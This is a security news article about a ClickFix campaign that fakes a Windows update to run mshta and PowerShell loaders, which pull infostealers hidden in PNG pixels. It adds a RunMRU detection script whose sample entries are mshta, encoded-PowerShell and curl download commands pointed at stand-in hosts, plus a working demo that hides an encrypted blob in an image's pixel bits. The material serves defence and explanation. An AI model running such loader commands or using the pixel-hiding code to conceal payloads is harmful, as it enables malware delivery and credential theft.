Fake Windows update steals passwords and crypto wallets
Cybercriminals have updated the notorious ClickFix social-engineering technique so that it now poses as a legitimate Windows update, tricking users into pasting a malicious command into the Run dialog. What makes this attack particularly clever is that the next-stage payload is hidden in the pixel data of a PNG image; once decoded, it deploys information stealers that collect usernames, passwords, cryptocurrency wallets, banking details, and other sensitive data.
Researchers at Huntress recently uncovered this new ClickFix variant. It displays a fake full-screen browser window that mimics a Windows update, complete with a progress bar stuck at 95 percent for a supposed "critical security update." The lure is most commonly served from fake adult websites that imitate popular portals, usually as an advertisement or an age-verification prompt. Clicking such an element opens the fake update screen.
Users are then instructed to press Windows + R and paste the attacker's command, which runs whatever the attacker chose under the victim's own account, with no download prompt or warning. The command launches mshta (the Microsoft HTML Application Host) with a malicious URL, and the fetched HTA pulls down further code stored in obfuscated, hex-encoded form. PowerShell scripts then run; they contain decoy checks aimed at confusing security products such as Bitdefender, fetch the PNG file, and decode the shellcode hidden in its pixels, which is injected into processes that are already running.
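Because the victim types the command into the Run dialog themselves, Windows records it in the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which makes that key a useful triage artifact for ClickFix incidents. The following Python is an added example, not code from the Huntress report or from the malware: it runs a small set of pattern rules over constructed RunMRU-style values (Windows appends a trailing `\1` to each stored command) and flags the ones that look like mshta or PowerShell loaders. The sample values, the rule names, and the exact regexes are assumptions for the demo, not indicators from the page.

```python
import re

# Constructed sample values in the style of HKCU\...\Explorer\RunMRU entries.
# These are made up for the example; the trailing "\1" mimics how Windows
# stores each entry. None of them is a real indicator from the report.
SAMPLE_RUNMRU = [
    r"notepad\1",
    r"mshta https://update-check.invalid/verify.php\1",
    r"powershell -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=\1",
    r"cmd /c curl -s https://cdn.invalid/p.png -o %TEMP%\p.png\1",
    r"\\fileserver\share\1",
    r"powershell Get-Process\1",
]

# Triage rules (assumed for the demo): name -> regex applied to the command.
RULES = [
    ("mshta launched with a remote URL",
     re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("PowerShell with encoded command",
     re.compile(r"\b(powershell|pwsh)(\.exe)?\b.*\s-e(nc(odedcommand)?)?\b", re.I)),
    ("PowerShell hidden window",
     re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I)),
    ("PowerShell download cradle",
     re.compile(r"\b(iex|invoke-expression|downloadstring|downloadfile|"
                r"invoke-webrequest|iwr|irm|invoke-restmethod)\b", re.I)),
    ("download via built-in tool",
     re.compile(r"\b(curl|certutil|bitsadmin)(\.exe)?\b.*https?://", re.I)),
]


def strip_runmru_suffix(value: str) -> str:
    """Drop the trailing '\\1' that Windows appends to stored Run commands."""
    return value[:-2] if value.endswith("\\1") else value


def triage_run_entries(entries):
    """Return [(command, [matched rule names])] for entries that hit any rule.

    Entries that match nothing are omitted, so the caller can treat the
    result as the list of commands worth a closer look.
    """
    findings = []
    for raw in entries:
        cmd = strip_runmru_suffix(raw)
        reasons = [name for name, rx in RULES if rx.search(cmd)]
        if reasons:
            findings.append((cmd, reasons))
    return findings


if __name__ == "__main__":
    for cmd, reasons in triage_run_entries(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS: {cmd}")
        for r in reasons:
            print(f"    - {r}")
```

On a live host the entries would come from `reg query` or `Get-ItemProperty` on the RunMRU key rather than from the constructed list; the rules are deliberately narrow (a URL argument to mshta, an encoded or hidden-window PowerShell, a download cradle) so that ordinary Run-dialog use such as `notepad` or a UNC path is not flagged.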
Although the PNG file looks harmless and opens as a normal image, its pixel values carry an encrypted payload. Once extracted and decrypted, it deploys infostealers such as Rhadamanthys or LummaC2, which harvest passwords, credentials, and crypto wallet data and send them to attacker-controlled servers.
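To show concretely how an image that renders normally can still carry a payload, the following Python is an added example (not the malware's code and not from the Huntress report). It writes a small 8-bit RGB PNG using only `zlib` and `struct`, hides a length-prefixed, XOR-encrypted blob in the least significant bit of each colour channel, then parses the PNG back, verifies the chunk CRCs, extracts the bits, and decrypts the blob. The cover image, the payload string, the XOR key and the least-significant-bit scheme are all assumptions for the demo; the real sample's encoding is not described on this page.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
WIDTH, HEIGHT = 16, 8                 # 16*8*3 = 384 channel bytes = 384 bits of capacity
PLAINTEXT = b"demo-second-stage"      # constructed stand-in for a second stage
XOR_KEY = b"k3y"                      # toy key, assumed for the example


def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _chunk(tag: bytes, body: bytes) -> bytes:
    """Build one PNG chunk: length, tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def make_png(width: int, height: int, rows) -> bytes:
    """Encode rows of flat RGB bytes as an 8-bit truecolor PNG, filter type 0."""
    raw = b"".join(b"\x00" + bytes(row) for row in rows)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def parse_png(data: bytes):
    """Minimal parser: 8-bit RGB, filter 0 only. Returns (width, height, rows)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", None, None
    while pos < len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if zlib.crc32(tag + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {tag!r}")
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if depth != 8 or ctype != 2:
                raise ValueError("only 8-bit RGB supported")
        elif tag == b"IDAT":
            idat += body
        elif tag == b"IEND":
            break
        pos += 12 + length
    raw, stride, rows = zlib.decompress(idat), width * 3 + 1, []
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        if line[0] != 0:
            raise ValueError("unsupported filter type")
        rows.append(list(line[1:]))
    return width, height, rows


def embed(rows, payload: bytes):
    """Store 4-byte big-endian length + payload, one bit per channel LSB."""
    blob = struct.pack(">I", len(payload)) + payload
    bits = [(byte >> (7 - i)) & 1 for byte in blob for i in range(8)]
    flat = [v for row in rows for v in row]
    if len(bits) > len(flat):
        raise ValueError("cover image too small for payload")
    for i, bit in enumerate(bits):
        flat[i] = (flat[i] & 0xFE) | bit
    w = len(rows[0])
    return [flat[i:i + w] for i in range(0, len(flat), w)]


def extract(rows) -> bytes:
    """Read the length prefix, then exactly that many payload bytes from LSBs."""
    flat = [v for row in rows for v in row]

    def take(nbytes: int, offset: int) -> bytes:
        out = bytearray()
        for b in range(nbytes):
            val = 0
            for i in range(8):
                val = (val << 1) | (flat[offset + b * 8 + i] & 1)
            out.append(val)
        return bytes(out)

    length = struct.unpack(">I", take(4, 0))[0]
    if 32 + length * 8 > len(flat):
        raise ValueError("declared length exceeds image capacity")
    return take(length, 32)


def cover_rows():
    """Deterministic gradient cover image (constructed, not a real asset)."""
    return [[(x * 16 + y * 3 + c * 7) & 0xFF for x in range(WIDTH) for c in range(3)]
            for y in range(HEIGHT)]


def build_demo_png() -> bytes:
    """Encrypt PLAINTEXT, hide it in the cover, and return the PNG bytes."""
    return make_png(WIDTH, HEIGHT, embed(cover_rows(), xor(PLAINTEXT, XOR_KEY)))


def recover_payload(png: bytes) -> bytes:
    """Parse the PNG, pull the hidden bytes out of the pixels, and decrypt."""
    _, _, rows = parse_png(png)
    return xor(extract(rows), XOR_KEY)


def max_channel_delta(png: bytes) -> int:
    """Largest per-channel change versus the untouched cover (1 for LSB hiding)."""
    _, _, rows = parse_png(png)
    return max(abs(a - b) for ra, rb in zip(rows, cover_rows()) for a, b in zip(ra, rb))


if __name__ == "__main__":
    png = build_demo_png()
    print(recover_payload(png), "max channel delta:", max_channel_delta(png))
```

The point for defenders is in `max_channel_delta`: every pixel moves by at most one unit, so the image is indistinguishable by eye, and the file is a structurally valid PNG with correct CRCs, so signature checks on the container see nothing wrong. Detection has to key on the loader behaviour (mshta and PowerShell fetching an image and then injecting into other processes) rather than on the image itself.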
Huntress reports that this variant has been spreading since early October, with many domains still hosting the fake update page. The attackers further pad the code with junk lines and odd quotations, including text from a UN disarmament meeting, to hinder analysis.
ClickFix is among the most effective malware-delivery techniques in current use, precisely because the victim launches the first stage themselves and no exploit is needed. Experts advise users to check the domain in the address bar, avoid suspicious ads, and never paste a command they do not understand into the Run dialog or a terminal; administrators can go further by blocking or restricting mshta.exe and reviewing Run-dialog history on suspected hosts.